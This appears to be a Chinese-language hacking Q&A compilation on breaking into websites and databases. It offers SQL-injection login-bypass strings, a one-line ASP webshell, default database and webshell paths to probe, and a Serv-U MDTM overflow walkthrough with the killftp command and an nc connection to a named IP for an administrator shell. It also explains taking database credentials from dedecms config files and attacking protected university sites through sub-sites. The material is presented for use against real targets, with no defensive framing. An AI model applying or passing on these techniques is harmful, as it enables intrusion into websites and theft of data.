本文目录一览：

• 1、如何入侵指定网站！
• 2、如何利用弱口令入侵MySQL数据库
• 3、如何从网站主页破解进入数据库服务器
• 4、入侵静态网站的方法
• 5、如何利用web来入侵Access数据库？入侵之后如何提取提取数据库文件？
• 6、怎么入侵防注入的网站？

如何入侵指定网站！

首先，观察指定网站。

入侵指定网站是需要条件的：

要先观察这个网站是动态还是静态的。

如果是静态的（.htm或html）,一般是不会成功的。

如果要入侵的目标网站是动态的，就可以利用动态网站的漏洞进行入侵。

Quote:以下是入侵网站常用方法：

1.上传漏洞如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”，80%就有漏洞了！

有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.

2.注入漏洞字符过滤不严造成的

3.暴库:把二级目录中间的/换成%5c

4.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有：

’or’’=’ " or "a"="a ’) or (’a’=’a ") or ("a"="a or 1=1-- ’ or ’a’=’a

5.社会工程学。这个我们都知道吧。就是猜解。

6.写入ASP格式数据库。就是一句话木马〈%execute request("value")%〉 （数据库必需得是ASP或ASA的后缀）

比如：默认数据库，默认后台地址，默认管理员帐号密码等

8.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.

/Databackup/dvbbs7.MDB

/bbs/Databackup/dvbbs7.MDB

/bbs/Data/dvbbs7.MDB

/data/dvbbs7.mdb

/bbs/diy.asp/diy.asp/bbs/cmd.asp

/bbs/cmd.exe

/bbs/s-u.exe

工具：网站猎手 挖掘鸡 明小子

如何利用弱口令入侵MySQL数据库

通过FTP弱口令入侵后台的方法

虽然通过刚才的步骤得到了存在FTP弱口令的主机,但并不表明它们都可以被入侵.因为他们的FTP服务器类型还没确定.可能是微软的TP.或者是WUFTP等等.

    而入侵时所利用的漏洞是serv-u FTP的, 所以还必须对这些存在FTP弱口令的主机进行一下类型确认;

    步骤1 将刚才扫描生成的ftpscan.txt进行过滤.全部留下IP.以每个IP一行的规则保存.

    步骤2 打开superscan扫描器.勾选"显示主机响应",IP设置里选择"导入文件",然后选择保存好的ftpscan.txt,最后将扫描端口定义在21上.完成之后就要吧开始扫描了

    步骤3:很快扫描完毕.详细显示了被扫描主机的FTP服务器类型.可以看出有台目标主机的FTP服务器类型为:serv-u FTP

    二. 入侵指定目标.

    通过刚才的扫描等一系列步骤.我已经确定了要下手的目标.

    下面,开始使用serv-u MDTM溢出漏洞进行入侵.

步骤1:在命令行下运行serv-u MDTM溢出的利用程序killftp.察看到帮助文件

步骤2:按照提示.我们输入命令:killftp 218.109.2.222 21 ftp ftp. 即对一台IP为218.109.2.222,帐号为FTP.密码为FTP的主机进行攻击,

可以看出,提示成功之后连接8111端口

步骤3:按照成功提示.我们利用NC端口程序连接目标主机的8111端口,输入连接命令:  nc -vv 218.109.2.222 8111 很快就可以得到一个新的

DOS窗口.而且这个窗口还是管理员权限的.就这么简单

如何从网站主页破解进入数据库服务器

方法/步骤

1 我们首先要在网站源码里面找到，php数据库的用户名和密码，还有ip地址，才能连接数据库服务器，一般数据库信息文件，在首页里面都是有包含的，就拿dedecms来说，打开首页，会看到if(!file_exists(dirname(__FILE__).'/data/common.inc.php'))。

2 我们就找data目录下的common.inc.php文件，就会看到数据库连接信息。

3 dbhost就是ip地址，这个是数据库的IP地址，dbname 就是数据库名字，dbuser就是数据库的用户名，dbpwd就是数据库的密码，然后打开我们要用到的mysql数据库连接软件Navicat for MySQL。

4 依次 文件--新建连接，然后出现连接信息，连接名随便写，ip地址就写你要连接的服务器的ip地址，端口不变3306，如果有改变就写设置的端口就可以，用户名就写刚刚得到的用户名，密码就写密码。然后连接就行。

5 我只是给大家拿dede一个演示，这样就可以了，如果其他的网站，根据源码的不同，数据库信息所在的文件也有所不同，一般都在conn.php,config.php,common.php,inc.php里面找就行了。

入侵静态网站的方法

静态网站是不好入侵的 。因为。html的网站没有动态数据库数据库，你没有办法向其写入数据。更没有办法写入漏洞什么的 ，像HTM的静态网页，跟本不返回信息到服务器上运行，只是一个页面而己。 当然，除非你能入侵到这个静态网站的服务器，进去以后远程改动信息。

如何利用web来入侵Access数据库？入侵之后如何提取提取数据库文件？

一般就是SQL注入，然后得到后台权限，得到webshell，提权，拿下服务器。你能得到webshell就可以直接下载mdb数据库文件了，或者找到数据库的路径下载下来也是可行的呀。

怎么入侵防注入的网站？

比如说一个大学网站，他的主站设置了防注入，但是你可以从分站入手，利用旁注的方法.不一定要注入，你可以看他有没有暴库漏洞，或者看他有没有上传漏动.你也可以从他开放的一些端口进行入侵.当然如果他是静态的网站那这些都没有用.